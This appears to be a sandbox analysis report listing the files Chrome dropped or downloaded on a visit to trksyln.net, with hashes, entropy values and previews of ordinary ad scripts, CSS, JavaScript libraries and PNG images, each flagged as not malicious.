                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-9495854422341365&output=html&adk=1812271804&adf=3025194257&abgtt=6&lmt=1730398767&plat=2%3A16777216%2C3%3A65536%2C4%3A65536%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A34603008%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Ftrksyln.net%2FError&pra=5&wgl=1&aihb=0&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aslmct=0.7&asamct=0.7&aiict=1&aiopts=1&aief=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1730398763282&bpp=14&bdt=1933&idt=3924&shv=r20241028&mjsv=m202410240101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&nras=1&correlator=5363632696827&frm=20&pv=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1017&bih=870&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C31088482%2C95344187%2C95335245%2C95345472%2C95345789%2C95345963%2C95345966&oid=2&pvsid=2973902258960805&tmod=55193809&uas=0&nvt=1&fsapi=1&ref=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=3998
                                                                                                                                                                                                                                                                                                                      Preview:<script>window.sra_later_blocks = [];</script><script>window.sra_later_blocks.push({creative:'\x3c!doctype html\x3e\x3chtml \x3e\x3chead\x3e\x3cstyle\x3e* {margin: 0;padding: 0;outline: none;}body {background: rgba(52, 58, 65, 0.600000);backdrop-filter: blur(15px); /*potential issue: minimal browser support*/-webkit-backdrop-filter: blur(15px); /*for safari*/height: 100%;}#ad_iframe {box-shadow: 0 !important;display: block;left: auto;margin: 0 auto;position: relative;top: auto;}.creative {transition: opacity 1s;-webkit-transition: opacity 1s;position: relative;}#card {background: #FFFFFF;border-radius: 30px;padding: 0 0px 0px;position: absolute;}html {height: 100%;}.toprow {width: 100%;display: flex;height: 24px;background: #FFFFFF;border-radius: 30px 30px 0 0;align-content: center;align-items: center;}.btn {display: table;transition: opacity 1s, background .75s;-webkit-transition: opacity 1s, background .75s;-moz-transition: opacity 1s, background .75s;-o-transition: opacity 1s, backg
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):2754
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.193623900439384
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:fwNdf9pTzTPvwsR2r2U4b3Ybk5JwYsH2/zlq9/S2sQBiETswEqHBnAFswkcK0MUG:f4df9hTHwsR2jk5sH2/2VzTmq6kRMkL
                                                                                                                                                                                                                                                                                                                      MD5:1CBBCCA1D53705256FE48B2DE6354B29
                                                                                                                                                                                                                                                                                                                      SHA1:3B0B68688A39F7109FA0A709A8B74EE690A97F4D
                                                                                                                                                                                                                                                                                                                      SHA-256:935B0999723A39EBAA3777EBCE2ED743881FD3776AA10393CE760AB0DBEACDF1
                                                                                                                                                                                                                                                                                                                      SHA-512:1A00FCC414F9C4EE9D046FB2A8F64B5219D06237B538F92972B8187F00A8942837B5EB734268855EAE1D4459FB19D9A5992D96064397C50B8DDC4EADCD376ED8
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t){"use strict";var i=function(e,o){this.options=t.extend({},i.DEFAULTS,o),this.$target=t(this.options.target).on("scroll.bs.affix.data-api",t.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",t.proxy(this.checkPositionWithEventLoop,this)),this.$element=t(e),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};function e(e){return this.each((function(){var o=t(this),f=o.data("bs.affix"),n="object"==typeof e&&e;f||o.data("bs.affix",f=new i(this,n)),"string"==typeof e&&f[e]()}))}i.VERSION="3.3.7",i.RESET="affix affix-top affix-bottom",i.DEFAULTS={offset:0,target:window},i.prototype.getState=function(t,i,e,o){var f=this.$target.scrollTop(),n=this.$element.offset(),s=this.$target.height();if(null!=e&&"t
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):41970
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.952243493903504
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:QYRIdacymFQ0cVzWw5DN81+yV7OHML2fWcOKmJgF7QvIeySrCk/8t3f+qZ4C:lGOmFQ0ch5DNq7OHVOyv8PHWEI3f74C
                                                                                                                                                                                                                                                                                                                      MD5:E9681E558391DD7368AC7E0828FFFE77
                                                                                                                                                                                                                                                                                                                      SHA1:A0B030B8914A2DA1F155DB53EFEF5E56EC348148
                                                                                                                                                                                                                                                                                                                      SHA-256:A57F6E4555D516B7A1BFF5D1EE889728561AD2E4D5275B50A462914315DD9CF5
                                                                                                                                                                                                                                                                                                                      SHA-512:BEBFDA119694BA8AEA8A9177C664C78399C94995CBDB33E610B562DC29B19176E30AE0F6F24DD4E7837D16369F1A608C6672EB506A7877B3BDB575C59EEBA9FA
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......t.....5V*e....PLTE.....*..)..'..*........+.........&.....%....~'.y...<........x#...n..t....\....L..dD.z%.q..s%....S....d .L..y'.wZ.x..f...t.c ..........t$.K$....m#.F(..{......Z..Q...S.U.....c..q"......D........g!.s#..`..P.T..@......A..p..i=.H..R.._......z......G..W..o.]".J".K....^.....\..A..=......S..f.....D..h..I.b.....{..^.rP.~.f...~<.vK.mB.d.U>.Z/.Q#.z.mB.d$..]..o.n=.{J.=..l.<..s`.^8..o.p..v.O0..m.sZ.`C.WB.U(.m0.J-.H6.pW..eA.M....eW.3.......\-....}v...3..:..gW.,......... .IDATx......^8..@7|..`... ."C;.h.d(..$mY$-Q.EJ.......&..,.....x.4..f.<.2..s........Q<...$....}...L.D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):3875
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.21080746216504
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:oMFiuNE7qj8MThYnWHK8HF3LLDNrFPX05c39:7NNgATXK2dPNrFPH
                                                                                                                                                                                                                                                                                                                      MD5:BD1466C2FFB9640B0C062AEE954C83B2
                                                                                                                                                                                                                                                                                                                      SHA1:E27657B673A90092D21E1F2AB7519FB78176A9EC
                                                                                                                                                                                                                                                                                                                      SHA-256:3F1BCC40B33449E15AE643DA68AD4DF9E525197DBEF09CBC612661B64C4A583D
                                                                                                                                                                                                                                                                                                                      SHA-512:8C4016579573B081773D2F58BF5AB905187AC78BE20E1DCBE48A17D03084E9E2E878BF8061409D3DA388BCE7B97189D2C4E39FC712DB5F0614FDCD18919A6CB5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/6298018922848964462/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......s.....(S.....~PLTE.o....<........)w.v...z.o.............._....."r.d.....%t....~..W.....4~......................B..M..O..r.....>...................*....`IDATx....Z.J..P..Q.E.QDm......b.2.D......_..kW..............................................................................................................................................................................................................................................................................................................................s...[....dvq:.^6..jc:../.....}W....q5j.|.......;m....Y{.....lp0.L.....w.'.Wo....#..|.V..U..b..m...kWI..w.1..ut.Q\.,.......O...O.9.]-....l...Z=.*..{....S......u.w..U.Y......-.W......{<]_...u.k.&._..~.E..JI...U?;.....X..J.Uu....,`wjE....r,...N..a...N`.;3.,.j...0.yF`.;..ux................)......0....,x..z.~..8e@....q$......h..p....U.W.....F..s...+.......y0y....K...#..:......u.....V.Xy..N...I.U.3.Z......X.?.5...8...[r.G....u..f.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 728 x 90, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):6903
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.777210754393487
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:30eNlhZHntC09e9qBRdjvmTSP4t++XrO2wXQ0RjBfv5oEIdJ+G/IGQL38l66hNyI:7NvZHtPziu4EEpPqVo52L31p2/5tig
                                                                                                                                                                                                                                                                                                                      MD5:CF4B5E15C04BB2DF72FDE2DF1C2F923D
                                                                                                                                                                                                                                                                                                                      SHA1:E59FC7341473D3FAABBFAF63EEB9CA1D188B2D13
                                                                                                                                                                                                                                                                                                                      SHA-256:2FE00C96B722401ECFA65A37FD463901DC91CCCCB4B789CE8D6EE0AA5073A2AF
                                                                                                                                                                                                                                                                                                                      SHA-512:0BD9F95865D43093D9570AAFA7147E65020CC2939733CC59FA9A68FF6127C012DEFCBA0F340E44C76CEB545A0995D9D4D8C833F026216FC188394C4ADF963609
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/6406916910759228465?sqp=4sqPyQQ7QjkqNxABHQAAtEIgASgBMAk4A0DwkwlYAWBfcAKAAQGIAQGdAQAAgD-oAQGwAYCt4gS4AV_FAS2ynT4&rs=AOga4qnytqedF_Wj2pEhPy2B16MkyO7adg
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......Z.............PLTE"..!.."..$.....A.0.........,..$..".....%........-..+../..!..-..#..2..)........(......../........&...........,.................3..5..S.D................0.........................&................[.L.................(........<.)......x.k.......................................>.,......7.#......$..5.!.............................9.&.........H.86.".......v.........?.,a.S..........{.....L.;...,.....).....h.[n._......L.;......C.2......A.2K.;....p._...g.X%..O.?...0....vl.[...rP.?t.f.....s-..C.2#..<.''.....E.3........y.h...G.9..z.j.....G.4.....q.^=.(...2..X.H...^.L..k.]A.......q..a.Pvvv...l.^n.`g.WR.=@.+9.&V.Ff.U\.IH.4Q.>...A.//.............yL.?...T.Ez.r..R.A3..e.OW.F...M.9t.d.....].Pt.iw.k...E.0............T.Ek.a~.p.....1.............zTXtRaw profile type APP1....m.A..0...~E......7u.HU[.....Rb+{..!X.|...o...i......2.)hP....2....zl.U.......c.s.^.=..u7.Y%A8}d.ux.H{.......*^..7 ..v..g...S......o.].....p.Q..>n
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27377)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):27592
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.83669575258768
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                                                                                                                                                                                                      MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                                                                                                                                                                                                      SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                                                                                                                                                                                                      SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                                                                                                                                                                                                      SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2020)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):9321
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.488083545900101
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:hAdU2WTFZOKRme5HNf4E/Q3uuNQ8Qd3yuM9lFEjr5zG:hAd9WTvOYB5R4E/QeuNVK3yu6lF6r4
                                                                                                                                                                                                                                                                                                                      MD5:35F2DD7CDD8EA7BEF7DD50FCA553A4A9
                                                                                                                                                                                                                                                                                                                      SHA1:35FAD9B309BE65A4200B417E608DE9068649D701
                                                                                                                                                                                                                                                                                                                      SHA-256:9F0E4A972197AF0DF6B45A3499BDA7BC8004A8D049673AF7076C867136C2A515
                                                                                                                                                                                                                                                                                                                      SHA-512:335D139CF2C0A3BAE76B977129C66AA54AAF8BD87B8229CD465D0F2868430AE4572F1AC913539F65057E805B90BF172D6938F01DE7D974EF007DFC8955C37575
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h=this||self;function k(a,b){a=a.split(".");var c=h;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};function aa(a){h.setTimeout(()=>{throw a;},0)};var l,p;a:{for(var q=["CLOSURE_FLAGS"],r=h,u=0;u<q.length;u++)if(r=r[q[u]],r==null){p=null;break a}p=r}var v=p&&p[610401301];l=v!=null?v:!1;var y;const z=h.navigator;y=z?z.userAgentData||null:null;function A(a){return l?y?y.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function B(a){var b;a:{if(b=h.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function C(){return l?!!y&&y.brands.length>0:!1}function D(){return C()?A("Chromium"):(B("Chrome")||B("CriOS"))&&!(C()?0:B("Edge"))||B("Silk")};!B("Android")||D();D();B("Safari")&&(D()||(C()?0:B("Coast"))||(C()?0:B("Opera"))||(C()?0:
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2093)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):445169
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.576759290731295
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:UrLbjvudFZTeHPGv7maR3WCdt4+/x3149jaxfR1tKaGcK0h3XJyx0sC1KP9IjYFy:UrLbjvudFZTeHPGv7maR3Wgt4+/x314S
                                                                                                                                                                                                                                                                                                                      MD5:EDF0BD3351932D1136D53EE56770466C
                                                                                                                                                                                                                                                                                                                      SHA1:4A45B85E71DB2E0B64C599A9DF52FB93B5C87933
                                                                                                                                                                                                                                                                                                                      SHA-256:87575248B862E2DD9D62D9143007DB7A187D77144FD71A1027B4847AA20E53BB
                                                                                                                                                                                                                                                                                                                      SHA-512:BA7A6FCEB65D95C5212CBBAB59130E41D31ED5D47397A39F38B3DDE6734E3DB0D50428FDB77FA9BE3A001B8EEF5C3A68552B8D367A680F9794E2E49C338807F7
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var q,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ia(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 125 x 36, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.7307811330275795
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:24:ZKnbdfzwgJ+V3R1vSLy5D212jHe8zir90sNHrnC6JhGj+x79V0+LH7Uej9:ZuZbJ+VhAyB/j+9r90QLy+l0ybVh
                                                                                                                                                                                                                                                                                                                      MD5:A41B8590BBDEDE59E04FAB9AD1934EB8
                                                                                                                                                                                                                                                                                                                      SHA1:A688FE1849C6986344A52F1266244EE386CA009D
                                                                                                                                                                                                                                                                                                                      SHA-256:4B74C8DE2F78D41DB98ADFD96A3EE0BCC4092018EB119952C341F820B38FB9D1
                                                                                                                                                                                                                                                                                                                      SHA-512:92A67A772C56E3F0B838BC03B6C73C05C9E96C92E9BC64C4D1D011B2E37D961E483EAA0772CD885540C32A4A036D1AD62B30E63620A445472BD804CB8BD8B648
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...}...$........(....pHYs...........~.....PLTETL.]/.lC....i@.kB.lC.[,.d9.b6.^0.`3.QI.RJ.f;.TL.h=.SK.Y<....lC....qI..`...._W.......nE...........oh...........vO.......~x.XP....|W.......{...........ZR..k..t.b5....UM.ib....lC.lC.lC.Y<.TL.GpLGpL.......CtRNS.............................................................4.....y.....1IDATX..kw.H......\X...........dv..................z.h..~..@.........?..u.:.......]A.$.a..._w..#..../cS......{..?Ho..k...l.-....+..w...v..b......g..s....k..h.](xw..R;.w....U....z.....&......T."......".....w..t.y..m...r1.M.5g.H.q..{..v..yp..L...=r.........g....UN..ty..S....'.0.C.;|.c.R8N.#:....U50Y#..Uaq...oao...<.r?.(;.f<.K.mZv...)=..G......]:p..f;.:..V.D...&.gF..5.[....]..~.{...H.MW_...W..?.D...i.....qG.u4E..h*+J..^.C.<IXl..|m.$.j^.xRd3.....P........(.yBR.X8.}..c.@..\!.3.S.... ..uI..<..2.Tj....E.F...W]..L...8...}..|@'5...t..@."^3+T...q:4......P=7.N..@.(...>.^^C.3..n.G.rU..... Z.k.k.KL.....]....>hq.=..r...
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:C++ source, ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):40512
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.518199113824284
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:8xMuZ0jicWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3fK:A+xbYcAYb2ZT3ZE3
                                                                                                                                                                                                                                                                                                                      MD5:1614EFD8D8B318CA80C151AA5D983224
                                                                                                                                                                                                                                                                                                                      SHA1:E27E5A72190F00DDABC4187084B8BD3850388D05
                                                                                                                                                                                                                                                                                                                      SHA-256:B682B162DDD14D549C16FDCC70C01AAF1A7C1C5EE9D12F8A45081CAF38499FF4
                                                                                                                                                                                                                                                                                                                      SHA-512:32E34011CAD366D6AC1BB0FD694829D233C66BB51813596A8EA6631E2E8516A25308768C988E9866C6B868174E993BCB62443D92AFEAFC9209B0A1C30CECECAB
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i||""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):175
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.619087129305596
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:zIRBEBc2LGRNaPG1TsK/Aze1yXaPFeL6oQYEx/uc/pKK/oQ0CM33vov:0ULfG2K/Ke1D89uQc/pizCzv
                                                                                                                                                                                                                                                                                                                      MD5:105FC75079DA05DFE0F9AB8E4CC1EDCE
                                                                                                                                                                                                                                                                                                                      SHA1:345160078F8076B9D17E159FCBA711F724AF4099
                                                                                                                                                                                                                                                                                                                      SHA-256:C240CA6597098155170D961700FB63A88DF5B6F335F484F37246A27D7CE3A497
                                                                                                                                                                                                                                                                                                                      SHA-512:738C41F5C1EF9169415E2837517E08260DEBA971EB4F011147C8B63CFF4AF74E372F7A892C870B0F8B649F0004298041E7CA94462361C8A405E2DE36D253978D
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/resources/js/navbar.js
                                                                                                                                                                                                                                                                                                                      Preview:$(document).ready(function () {.. $('#nav-toggle').click(function () {.. $(this).toggleClass('is-active').. $('ul.nav').toggleClass('show');.. });..});....
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2775)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):93273
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.584589836285788
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Xg80TNpmPCqiB3c+G5CSJ7FyCSzGWKZtO6Lz3FIk4K9SCeIzkDjtRbXQjzJIn+QN:XbqpmPCqU3cFTxyCSzGW7XFCeI4DjtNt
                                                                                                                                                                                                                                                                                                                      MD5:8F69EB8CC76FB10B2AD5FDB55B62F12E
                                                                                                                                                                                                                                                                                                                      SHA1:3104016FB431EC748E6D7D4828B7A9A41966752D
                                                                                                                                                                                                                                                                                                                      SHA-256:E3849FBFBAF8AC5D5EBB07AEB38EC22BB6AEDA670195D7C36D40861E3BA77DFF
